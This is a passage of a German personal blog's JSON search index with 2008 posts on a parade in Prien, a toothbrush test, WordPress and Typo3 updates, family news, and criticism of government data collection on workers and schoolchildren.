href=\"http://www.ibm.com/lotus\" target=\"_blank\"\u003eLotus Notes / Domino \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n haben wird,\nwerde ich mir den \u003ca href=\"http://typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Relaunch des Blogs nochmal\nüberlegen. In nächster Zeit bleibt hier erstmal alles beim Alten, nur am\nDesign werd ich einige Anpassungen durchführen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-07-13-neuer-job/","title":"Neuer Job"},{"body":"Das ist doch wieder der Oberschwachsinn. Immer mehr Kontrollen, immer mehr Datenbanken und Verküpfungsmöglichkeiten.\nSo kommt auf fast jedes Unternehmen eine Unmenge Personalaufwand und Zusatzkosten und auf die zahlreichen Versicherungen ein riesiger Datenwust zu. Für die allermeisten Berufsgenossenschaften war eine individuelle Zeiterfassung bislang schlichtweg nicht notwendig. Es bleibt unklar, warum der Gesetzgeber diese einführen will.\n— gulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb http://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/ ","excerpt":"\u003cp\u003eDas ist doch wieder der Oberschwachsinn. Immer mehr Kontrollen, immer\nmehr Datenbanken und Verküpfungsmöglichkeiten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSo kommt auf fast jedes Unternehmen eine Unmenge Personalaufwand und Zusatzkosten und auf die zahlreichen Versicherungen ein riesiger Datenwust zu. Für die allermeisten Berufsgenossenschaften war eine individuelle Zeiterfassung bislang schlichtweg nicht notwendig. Es bleibt unklar, warum der Gesetzgeber diese einführen will.\u003c/p\u003e\n\u003cp\u003e—\ngulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb\n\u003ca href=\"http://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/\" target=\"_blank\"\u003ehttp://www.gulli.com/news/stechuhr-und-b-rokratie-2008-06-26/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2008/2008-06-27-gulli-stechuhr-und-burokratie-bundestag-will-arbeitszeiterfassung-fur-jeden-betrieb/","title":"gulli: Stechuhr und Bürokratie: Bundestag will Arbeitszeiterfassung für jeden Betrieb"},{"body":"Heute war der historische Umzug zur Feier des 850-jährigen Jubiläums von Prien. Es war ein wirklich schönes Ereignis, das mir als Teilnehmer sehr viel Spaß gemacht hat.\nDie Wagen und Kostüme waren mit viel Liebe zum Detail geschmückt und trotz der Hitze und strahlendem Sonnenschein wurde auch auf Pelze (Ritter auf English Horse) nicht verzichtet. Die Ludwig-Thoma-Schützen zeigten die Markterhebung 1897. Auf dem Wagen befanden sich der Bürgermeister, mit Gemeinderat und der Ernennungsurkunde. Den Wagen begleiteten als Bürger kostümierte Vereinsmitglieder, die z.T. an \u0026ldquo;Unsere kleine Farm\u0026rdquo; erinnerten.\nhttp://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg Weitere Fotos und mehr Details zum Wagen der Ludwig-Thoma-Schützen werde ich die nächsten Tage unter http://lts.prien.de unter Chronik einstellen.\n","excerpt":"\u003cp\u003eHeute war der historische Umzug zur Feier des 850-jährigen Jubiläums von\nPrien. Es war ein wirklich schönes Ereignis, das mir als Teilnehmer sehr\nviel Spaß gemacht hat.\u003c/p\u003e\n\u003cp\u003eDie Wagen und Kostüme waren mit viel Liebe zum Detail geschmückt und\ntrotz der Hitze und strahlendem Sonnenschein wurde auch auf Pelze\n(Ritter auf English Horse) nicht verzichtet. Die Ludwig-Thoma-Schützen\nzeigten die Markterhebung 1897. Auf dem Wagen befanden sich der\nBürgermeister, mit Gemeinderat und der Ernennungsurkunde. Den Wagen\nbegleiteten als Bürger kostümierte Vereinsmitglieder, die z.T. an\n\u0026ldquo;Unsere kleine Farm\u0026rdquo; erinnerten.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/06/prien850_lts.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eWeitere Fotos und mehr Details zum Wagen der Ludwig-Thoma-Schützen werde\nich die nächsten Tage unter \u003ca href=\"http://lts.prien.de\" target=\"_blank\"\u003ehttp://lts.prien.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n unter Chronik\neinstellen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-22-historischer-umzug-in-prien/","title":"Historischer Umzug in Prien"},{"body":"Morgen ist, zur 850-Jahrfeier , ein historischer Umzug in Prien.\nAufstellung ist zwischen 11 und 12 Uhr. Start des Zuges, der ca. 60 Pferdefuhrwerke mit historischen Ereignissen zeigt, ist dann um 13 Uhr.\nDie Ludwig-Thoma-Schützen zeigen die Markterhebung 1896 auf dem Wagen 20.\n","excerpt":"\u003cp\u003eMorgen ist, zur\n\u003ca href=\"http://tourismus.prien.de/de/main/850_jahre_prien_am_chiemsee.htm\" target=\"_blank\"\u003e850-Jahrfeier \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nein historischer Umzug in Prien.\u003c/p\u003e\n\u003cp\u003eAufstellung ist zwischen 11 und 12 Uhr. Start des Zuges, der ca. 60\nPferdefuhrwerke mit historischen Ereignissen zeigt, ist dann um 13 Uhr.\u003c/p\u003e\n\u003cp\u003eDie \u003ca href=\"http://lts.stoeps.de\" target=\"_blank\"\u003eLudwig-Thoma-Schützen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zeigen die Markterhebung\n1896 auf dem Wagen 20.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-prien-wird-850-jahre/","title":"Prien wird 850 Jahre"},{"body":"Ich habe mich vor ein paar Wochen bei trnd angemeldet und mich dort für den Test der Zahnbürste Philips Sonicare beworben.\nBisher hat mich immer der Preis (um die 100€) vom Erwerb einer elektrischen Zahnbürste abgehalten. Bei trnd wurde ich für den Test ausgewählt und jetzt kann ich die Zahnbürste problemlos testen und wenn mich das Produkt überzeugt auch Werbung dafür machen.\nDie ersten Male Zähneputzen habe ich jetzt mit der Sonicare hinter mir und ich muss sagen, dass mir das Putzen damit immer besser gefällt. Am Anfang war die Vibration im Mund und das Geräusch doch sehr ungewohnt, ja z.T. sogar unangenehm. Nach der kurzen Eingewöhnungsphase macht mir das allerdings nichts mehr aus.\nDie Putzleistung hat mich dagegen von Anfang an überzeugt und bei der Benutzung von zusätzlicher Zahnseide oder Interdentalbürstchen ist praktisch kein Restbelag, auch zwischen den Zähnen, mehr vorhanden.\nAllerdings bin ich mir nicht sicher, ob ich die Sonicare auch zum normalen Ladenpreis kaufen würde, da der Preis in Relation zu einer Handzahnbürste doch etwas höher ist.\n","excerpt":"\u003cp\u003eIch habe mich vor ein paar Wochen bei \u003ca href=\"http://www.trnd.com\" target=\"_blank\"\u003etrnd \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nangemeldet und mich dort für den Test der Zahnbürste\n\u003ca href=\"http://www.homeandbody.philips.com/sonicare/de_de/\" target=\"_blank\"\u003ePhilips Sonicare \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nbeworben.\u003c/p\u003e\n\u003cp\u003eBisher hat mich immer der Preis (um die 100€) vom Erwerb einer\nelektrischen Zahnbürste abgehalten. Bei trnd wurde ich für den Test\nausgewählt und jetzt kann ich die Zahnbürste problemlos testen und wenn\nmich das Produkt überzeugt auch Werbung dafür machen.\u003c/p\u003e\n\u003cp\u003eDie ersten Male Zähneputzen habe ich jetzt mit der Sonicare hinter mir\nund ich muss sagen, dass mir das Putzen damit immer besser gefällt. Am\nAnfang war die Vibration im Mund und das Geräusch doch sehr ungewohnt,\nja z.T. sogar unangenehm. Nach der kurzen Eingewöhnungsphase macht mir\ndas allerdings nichts mehr aus.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-zahnburstentest/","title":"Zahnbürstentest"},{"body":"Ich dachte eigentlich, daß der Relaunch mit Typo3 schneller über die Bühne geht, aber leider bin ich noch in der Testphase.\nDaher habe ich heute Nacht die Blogsoftware auf Version 2.5.1 aktualisiert. An sich ging es diesmal problemlos, nur bei ftp-Upload hat Cyberduck ein paar Dateien nicht geändert und es kam zu Fehlermeldungen, die aber schnell behoben waren.\nTheme bleibt vorerst gleich, ich hoffe immer noch auf einen schnellen Wechsel zu Typo3.\n","excerpt":"\u003cp\u003eIch dachte eigentlich, daß der Relaunch mit \u003ca href=\"http://www.typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nschneller über die Bühne geht, aber leider bin ich noch in der\nTestphase.\u003c/p\u003e\n\u003cp\u003eDaher habe ich heute Nacht die Blogsoftware auf Version 2.5.1\naktualisiert. An sich ging es diesmal problemlos, nur bei ftp-Upload hat\n\u003ca href=\"http://www.cyberduck.ch\" target=\"_blank\"\u003eCyberduck \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ein paar Dateien nicht geändert und\nes kam zu Fehlermeldungen, die aber schnell behoben waren.\u003c/p\u003e\n\u003cp\u003eTheme bleibt vorerst gleich, ich hoffe immer noch auf einen schnellen\nWechsel zu Typo3.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-21-wordpress-update-auf-251-erfolgreich/","title":"WordPress Update auf 2.5.1 erfolgreich"},{"body":"Ich habe gerade meine Seiten http://lts.stoeps.de von Typo3 4.0.4 auf 4.2.1 aktualisiert und war überrascht, dass dies so einfach möglich war. Nur die neuen Typo3_src-Files per FTP übertragen, den Update Wizard starten und schon paßt es wieder.\n","excerpt":"\u003cp\u003eIch habe gerade meine Seiten \u003ca href=\"http://lts.stoeps.de\" target=\"_blank\"\u003ehttp://lts.stoeps.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von\n\u003ca href=\"http://www.typo3.org\" target=\"_blank\"\u003eTypo3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 4.0.4 auf 4.2.1 aktualisiert und war\nüberrascht, dass dies so einfach möglich war. Nur die neuen\nTypo3_src-Files per FTP übertragen, den Update Wizard starten und schon\npaßt es wieder.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-20-typo3-update-problemlos/","title":"Typo3 Update problemlos"},{"body":"Eine kurze Anleitung um die Auflösung der Linux Konsole in Grub vorzugeben:\nEchoes: How-To: Change Console Resolution\n","excerpt":"\u003cp\u003eEine kurze Anleitung um die Auflösung der Linux Konsole in Grub\nvorzugeben:\u003c/p\u003e\n\u003cp\u003eEchoes: How-To: Change Console Resolution\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-19-echoes-how-to-change-console-resolution/","title":"Echoes: How-To: Change Console Resolution"},{"body":"So, nach langer Zeit mal wieder ein Blogpost.\nIch war die letzten Wochen ziemlich beschäftigt, ich bin seit zwei Wochen Papa und das fordert doch einiges mehr an Zeit, als ich zuerst dachte.\nIn Zukunft werden die Posts aber wieder mehr werden. Ich arbeite gerade an einem Artikel über OpenLDAP und Linux-Authentifizierung, ausserdem plane und arbeite ich an einem kompletten Relaunch meiner Domain mit Typo3. Das Theme ist bereits übernommen und die meisten Anpassungen mit Typoskript und Extensions sind auch schon eingebaut. Momentan fehlt noch ein bisschen Feinschliff von Timtab (Blogextension) und der richtige Provider, ich werde vermutlich die Domains zu einem Typo3-Hoster umziehen, habe mich aber noch nicht entschieden zu welchem. Wenn jemand Tipps hat, dann schreibt doch bitte einen Kommentar oder eine E-Mail.\nEin weiterer Artikel wird Ubuntu 8.04 auf dem Macbook sein, der entsteht aber erst. Im Moment habe ich wieder mal Probleme mit dem WLAN Zugriff auf meinen Airport Express.\nAusserdem habe ich mit Microblogging begonnen. :-) Wer Bock hat, kann ein paar Kurzposts unter http://www.twitter.com/stoeps mitlesen.\nGestern beim Angeln habe ich ca. 300 m vom Ufer entfernt eine Ringelnatter gesehen. Das war sehr schön, siehe folgendes Bild.\nDas Bild der Familie Schwan ist mit dem Handy leider nichts geworden. Ich bin allerdings von der Qualität der Fotos meines neuen Sony-Erikson Handys W580i ziemlich begeistert.\n","excerpt":"\u003cp\u003eSo, nach langer Zeit mal wieder ein Blogpost.\u003c/p\u003e\n\u003cp\u003eIch war die letzten Wochen ziemlich beschäftigt, ich bin seit zwei\nWochen Papa und das fordert doch einiges mehr an Zeit, als ich zuerst\ndachte.\u003c/p\u003e\n\u003cp\u003eIn Zukunft werden die Posts aber wieder mehr werden. Ich arbeite gerade\nan einem Artikel über OpenLDAP und Linux-Authentifizierung, ausserdem\nplane und arbeite ich an einem kompletten Relaunch meiner Domain mit\n\u003ca href=\"http://typo3.org\" target=\"_blank\"\u003eTypo3. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Das Theme ist bereits übernommen und die\nmeisten Anpassungen mit Typoskript und Extensions sind auch schon\neingebaut. Momentan fehlt noch ein bisschen Feinschliff von Timtab\n(Blogextension) und der richtige Provider, ich werde vermutlich die\nDomains zu einem Typo3-Hoster umziehen, habe mich aber noch nicht\nentschieden zu welchem. Wenn jemand Tipps hat, dann schreibt doch bitte\neinen Kommentar oder eine E-Mail.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-04-paula-angeln-und-verschlafener-fruhling/","title":"Paula, Angeln und verschlafener Frühling"},{"body":"Coole Sache, das werde ich auch mal ausprobieren! Das würde für mich als Morgenmuffel ziemlich gut passen. :-)\n\u0026lt;em\u0026gt;\u0026lt;a href=\u0026#34;http://nessy.twoday.net\u0026#34; target=\u0026#34;_blank\u0026#34;\u0026gt;Draußen nur Kännchen\u0026lt;/a\u0026gt;\u0026lt;/em\u0026gt;. Nessy sagt in ihrer Selbstbeschreibung über sich: \u0026lt;strong\u0026gt;Spricht vor elf Uhr morgens selten ganze Sätze, hält stattdessen Antworttäfelchen mit den Texten “Ja”, “Nein” und “Frage umformulieren” hoch.\u0026lt;/strong\u0026gt; [From \u0026lt;a href=\u0026#34;http://louffi.de/2008/06/04/ich-wunsch-mir-schone-tafeln/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Ich wünsch’ mir schöne Tafeln\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;] ","excerpt":"\u003cp\u003eCoole Sache, das werde ich auch mal ausprobieren! Das würde für mich als\nMorgenmuffel ziemlich gut passen. :-)\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;em\u0026gt;\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://nessy.twoday.net\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003etarget\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;_blank\u0026#34;\u003c/span\u003e\u0026gt;Draußen nur Kännchen\u0026lt;/a\u0026gt;\u0026lt;/em\u0026gt;.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNessy sagt in ihrer Selbstbeschreibung über sich:\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;strong\u0026gt;Spricht vor elf Uhr morgens selten ganze Sätze, hält stattdessen Antworttäfelchen mit den Texten “Ja”, “Nein” und “Frage umformulieren” hoch.\u0026lt;/strong\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e[From \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://louffi.de/2008/06/04/ich-wunsch-mir-schone-tafeln/\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;cite\u0026gt;Ich wünsch’ mir schöne Tafeln\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;]\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2008/2008-06-04-ich-wunsch-mir-schone-tafeln/","title":"Ich wünsch’ mir schöne Tafeln"},{"body":"Ich frage mich schön langsam für was wir diese ganze Datensammlungen und IDs brauchen. Nicht nur dass wir eine Steuer-ID erhalten, die nicht wie angekündigt nur von den Finanzämtern im Zugriff ist, jetzt bekommen unsere Kinder gleich noch eine lebenslange Schul-ID. Über Löschung und Auskünfte hat man sich nicht viele Gedanken gemacht.\nEin Gesetzentwurf der bayerischen Landesregierung sieht vor, ab Sommer 2008 Daten sämtlicher Schüler, deren Eltern und aller Lehrer zentral und personenbezogen zu sammeln („Totalerhebung“).\u0026lt;br /\u0026gt; [From \u0026lt;a href=\u0026#34;http://www.daten-speicherung.de/index.php/bayern-plant-totalerhebung-von-schueler-eltern-und-lehrerdaten/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;] Folgende Daten sollen erfaßt werden: \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;von Schülern:\u0026lt;/span\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Name\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Adresse\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;schulische Daten\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Daten zur Schullaufbahn\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Vorbildung\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Ergebnisse der Vergleichsarbeiten (Jahrgangsstufentests in jeder Klasse und Schulform)\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Ergebnisse der zentralen Abschlussprüfung\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Namen und Adresse der Eltern\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;weitere Daten\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; \u0026lt;/li\u0026gt; [\u0026amp;#8230;] \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Es soll jederzeit durch Rechtsverordnung des Ministeriums möglich sein, weitere Daten einzubeziehen.\u0026lt;br /\u0026gt; \u0026lt;span style=\u0026#34;color: #000000; font-family: Helvetica; line-height: normal;\u0026#34;\u0026gt;[From \u0026lt;a href=\u0026#34;http://www.daten-speicherung.de/index.php/bayern-plant-totalerhebung-von-schueler-eltern-und-lehrerdaten/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;]\u0026lt;/span\u0026gt;\u0026lt;/span\u0026gt; Diesen Satz finde ich die Oberfrechheit! Um nicht eine Gesetzesänderung zu benötigen, wenn man die DB erweitern will, läßt man sich hier einen Freibrief erstellen für die Speicherung und Erhebung weiterer Daten.\nHier der Gesetzentwurf. ","excerpt":"\u003cp\u003eIch frage mich schön langsam für was wir diese ganze Datensammlungen und\nIDs brauchen. Nicht nur dass wir eine Steuer-ID erhalten, die nicht wie\nangekündigt nur von den Finanzämtern im Zugriff ist, jetzt bekommen\nunsere Kinder gleich noch eine lebenslange Schul-ID. Über Löschung und\nAuskünfte hat man sich nicht viele Gedanken gemacht.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEin Gesetzentwurf der bayerischen Landesregierung sieht vor, ab Sommer \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e2008\u003c/span\u003e Daten sämtlicher Schüler, deren Eltern und aller Lehrer zentral und personenbezogen zu sammeln („Totalerhebung“).\u0026lt;br /\u0026gt; [From \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.daten-speicherung.de/index.php/bayern-plant-totalerhebung-von-schueler-eltern-und-lehrerdaten/\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;cite\u0026gt;Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;]\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"folgende-daten-sollen-erfaßt-werden\"\u003eFolgende Daten sollen erfaßt werden: \u003ca href=\"#folgende-daten-sollen-erfa%c3%9ft-werden\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;von Schülern:\u0026lt;/span\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;ul\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Name\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Adresse\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;schulische Daten\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Daten zur Schullaufbahn\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Vorbildung\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Ergebnisse der Vergleichsarbeiten (Jahrgangsstufentests in jeder Klasse und Schulform)\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 